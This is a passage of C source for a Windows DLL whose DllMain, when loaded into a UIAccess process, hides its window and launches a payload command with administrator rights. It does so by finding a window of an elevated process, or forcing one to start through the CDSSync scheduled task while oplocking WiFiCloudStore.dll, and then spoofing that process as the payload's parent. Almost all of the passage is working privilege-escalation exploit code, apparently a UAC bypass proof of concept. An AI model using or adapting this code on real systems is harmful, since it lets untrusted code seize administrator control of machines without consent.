115 | 	process = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, pid);
116 | 	if (!process)
117 | 	{
118 | 		return TRUE;
119 | 	}
120 | 	if (!OpenProcessToken(process, MAXIMUM_ALLOWED, &token))
121 | 	{
122 | 		CloseHandle(process);
123 | 		return TRUE;
124 | 	}
125 | 	CloseHandle(process);
126 | 	retlen = 0;
127 | 	if (!GetTokenInformation(token, TokenElevationType, &elevtype, sizeof(elevtype), &retlen))
128 | 	{
129 | 		CloseHandle(token);
130 | 		return TRUE;
131 | 	}
132 | 	CloseHandle(token);
133 | 	if (elevtype != TokenElevationTypeFull)
134 | 	{
135 | 		return TRUE;
136 | 	}
137 | 	process = GetHwndFullProcessHandle(hwnd);
138 | 	if (process)
139 | 	{
140 | 		*(HANDLE*)lparam = process;
141 | 		return FALSE;
142 | 	}
143 | 	return TRUE;
144 | }
145 | 
146 | static HANDLE FindFirstElevatedProcessHandle()
147 | {
148 | 	HANDLE process = NULL;
149 | 	EnumWindows((WNDENUMPROC)EnumElevatedProcessHandle, (LPARAM)&process);
150 | 	return process;
151 | }
152 | 
153 | static BOOL CheckUIAccessPermissions()
154 | {
155 | 	HANDLE token = NULL;
156 | 	BYTE tmlbuf[sizeof(TOKEN_MANDATORY_LABEL) + sizeof(SID)] = { 0 };
157 | 	TOKEN_MANDATORY_LABEL* tml = (TOKEN_MANDATORY_LABEL*)&tmlbuf[0];
158 | 	DWORD uiaccess = 0;
159 | 	DWORD* integrity = NULL;
160 | 	DWORD retlen = 0;
161 | 
162 | 	if (!OpenProcessToken((HANDLE)-1, MAXIMUM_ALLOWED, &token))
163 | 	{
164 | 		return FALSE;
165 | 	}
166 | 	retlen = sizeof(uiaccess);
167 | 	if (!GetTokenInformation(token, TokenUIAccess, &uiaccess, sizeof(uiaccess), &retlen))
168 | 	{
169 | 		CloseHandle(token);
170 | 		return FALSE;
171 | 	}
172 | 	if (!uiaccess)
173 | 	{
174 | 		CloseHandle(token);
175 | 		return FALSE;
176 | 	}
177 | 	retlen = sizeof(tmlbuf);
178 | 	if (!GetTokenInformation(token, TokenIntegrityLevel, tml, retlen, &retlen))
179 | 	{
180 | 		CloseHandle(token);
181 | 		return FALSE;
182 | 	}
183 | 	integrity = GetSidSubAuthority(tml->Label.Sid, 0);
184 | 	if (*integrity < 0x3000)
185 | 	{
186 | 		CloseHandle(token);
187 | 		return FALSE;
188 | 	}
189 | 	CloseHandle(token);
190 | 	return TRUE;
191 | }
192 | 
193 | static BOOL StartBackupLockedElevatedProcess(POPLOCK_FILE_CONTEXT ofc)
194 | {
195 | 	WCHAR task_cmdline[200] = { 0 };
196 | 	WCHAR oplock_path[100] = { 0 };
197 | 	PROCESS_INFORMATION pi = { 0 };
198 | 	STARTUPINFO si = { 0 };
199 | 	DWORD exitcode = 1;
200 | 
201 | 	if (!ofc)
202 | 	{
203 | 		return FALSE;
204 | 	}
205 | 	if (ofc->len < sizeof(OPLOCK_FILE_CONTEXT))
206 | 	{
207 | 		return FALSE;
208 | 	}
209 | 	if (!GetSystemDirectoryW(oplock_path, 80))
210 | 	{
211 | 		return FALSE;
212 | 	}
213 | 	lstrcpyW(task_cmdline, oplock_path);
214 | 	lstrcatW(oplock_path, L"\\WiFiCloudStore.dll");
215 | 	lstrcatW(task_cmdline, L"\\schtasks.exe /RUN /TN \"\\Microsoft\\Windows\\WlanSvc\\CDSSync\" /I");
216 | 	if (!OpLockFile(oplock_path, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, TRUE, ofc))
217 | 	{
218 | 		return FALSE;
219 | 	}
220 | 	memset(&pi, 0, sizeof(pi));
221 | 	memset(&si, 0, sizeof(si));
222 | 	si.cb = sizeof(si);
223 | 	si.dwFlags = STARTF_FORCEOFFFEEDBACK | STARTF_USESHOWWINDOW;
224 | 	si.wShowWindow = SW_HIDE;
225 | 	if (!CreateProcessW(NULL, task_cmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
226 | 	{
227 | 		ReleaseOpLock(ofc);
228 | 		return FALSE;
229 | 	}
230 | 	CloseHandle(pi.hThread);
231 | 	WaitForSingleObject(pi.hProcess, 3000);
232 | 	if (!GetExitCodeProcess(pi.hProcess, &exitcode))
233 | 	{
234 | 		CloseHandle(pi.hProcess);
235 | 		ReleaseOpLock(ofc);
236 | 		return FALSE;
237 | 	}
238 | 	CloseHandle(pi.hProcess);
239 | 	if (exitcode)
240 | 	{
241 | 		ReleaseOpLock(ofc);
242 | 		return FALSE;
243 | 	}
244 | 	return TRUE;
245 | }
246 | 
247 | static BOOL StopBackupLockedElevatedProcess(POPLOCK_FILE_CONTEXT ofc)
248 | {
249 | 	return ReleaseOpLock(ofc);
250 | }
251 | 
252 | static BOOL StartElevatedCmd()
253 | {
254 | 	HANDLE process = NULL;
255 | 	PROCESS_INFORMATION pi = { 0 };
256 | 	OPLOCK_FILE_CONTEXT ofc = { 0 };
257 | 	WCHAR cmdline[] = PAYLOAD_CMD;
258 | 	BOOL ret = FALSE;
259 | 	int i = 0;
260 | 
261 | 	memset(&ofc, 0, sizeof(ofc));
262 | 	ofc.len = sizeof(ofc);
263 | 	ofc.file = INVALID_HANDLE_VALUE;
264 | 	process = FindFirstElevatedProcessHandle();
265 | 	if (!process)
266 | 	{
267 | 		if (StartBackupLockedElevatedProcess(&ofc))
268 | 		{
269 | 			for (i = 0; i < 5000; i += 500)
270 | 			{
271 | 				Sleep(500);
272 | 				process = FindFirstElevatedProcessHandle();
273 | 			}
274 | 		}
275 | 	}
276 | 	if (process)
277 | 	{
278 | 		memset(&pi, 0, sizeof(pi));
279 | 		ret = CreateProcessWithParentW(cmdline, process, CREATE_NEW_CONSOLE, SW_SHOW, &pi);
280 | 		if (ret)
281 | 		{
282 | 			CloseHandle(pi.hThread);
283 | 			CloseHandle(pi.hProcess);
284 | 		}
285 | 		CloseHandle(process);
286 | 	}
287 | 	if (ofc.file != INVALID_HANDLE_VALUE)
288 | 	{
289 | 		StopBackupLockedElevatedProcess(&ofc);
290 | 	}
291 | 	return ret;
292 | }
293 | 
294 | static BOOL HideMainWindowCallback(HWND hwnd, LPARAM lparam)
295 | {
296 | 	DWORD pid = 0;
297 | 	HANDLE process = NULL;
298 | 	HANDLE token = NULL;
299 | 	DWORD elevtype = 0;
300 | 	DWORD retlen = 0;
301 | 
302 | 	GetWindowThreadProcessId(hwnd, &pid);
303 | 	if (!pid)
304 | 	{
305 | 		return TRUE;
306 | 	}
307 | 	if (GetCurrentProcessId() != pid)
308 | 	{
309 | 		return TRUE;
310 | 	}
311 | 	if (GetWindow(hwnd, GW_OWNER))
312 | 	{
313 | 		return TRUE;
314 | 	}
315 | 	if (!IsWindowVisible(hwnd))
316 | 	{
317 | 		return TRUE;
318 | 	}
319 | 	ShowWindow(hwnd, SW_HIDE);
320 | 	return TRUE;
321 | }
322 | 
323 | static void HideMainWindow()
324 | {
325 | 	EnumWindows((WNDENUMPROC)HideMainWindowCallback, 0);
326 | }
327 | 
328 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
329 | {
330 | 	UINT exitcode = 0;
331 | 
332 |     switch (ul_reason_for_call)
333 |     {
334 |     case DLL_PROCESS_ATTACH:
335 | 		if (CheckUIAccessPermissions())
336 | 		{
337 | 			HideMainWindow();
338 | 			exitcode = !StartElevatedCmd();
339 | 			ExitProcess(exitcode);
340 | 		}
341 |         break;
342 |     case DLL_THREAD_ATTACH:
343 |         break;
344 |     case DLL_THREAD_DETACH:
345 |         break;
346 |     case DLL_PROCESS_DETACH:
347 |         break;
348 |     }
349 |     return TRUE;
350 | }
351 | 
352 | 


--------------------------------------------------------------------------------